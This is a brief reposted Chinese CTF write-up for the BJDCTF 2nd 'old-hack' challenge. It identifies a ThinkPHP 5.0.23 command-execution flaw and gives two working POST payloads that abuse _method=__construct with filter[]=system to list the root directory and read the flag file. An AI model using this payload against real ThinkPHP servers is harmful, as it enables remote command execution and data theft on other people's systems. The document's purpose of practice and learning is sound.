[BJDCTF 2nd]old-hack

本文转载自查看原文 2020-03-23 00:26 1702 ctf

进入首页:
首页告诉了我们是thinkphp5的漏洞。

知道了是哪个版本的话就搜一搜喽:最后发现是thinkphp5.0.23的命令执行

payload_1：查看根目录文件，发现flag位置

http://90b89500-3ac6-40a5-9f1e-e84e8923115f.node3.buuoj.cn
POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /

payload_2：读取flag

http://90b89500-3ac6-40a5-9f1e-e84e8923115f.node3.buuoj.cn
POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 [BUUOJ记录] [BJDCTF 2nd]old-hack & Schrödinger & elementmaster [BJDCTF 2nd]duangShell BJDCTF 2nd Writeup [BJDCTF 2nd] - Misc BUUOJ [BJDCTF 2nd]elementmaster [BJDCTF 2nd]fake google [BJDCTF 2nd]xss之光 [BJDCTF 2nd]简单注入 Buuoj [BJDCTF 2nd]最简单的misc [BUUOJ记录] [BJDCTF 2nd]文件探测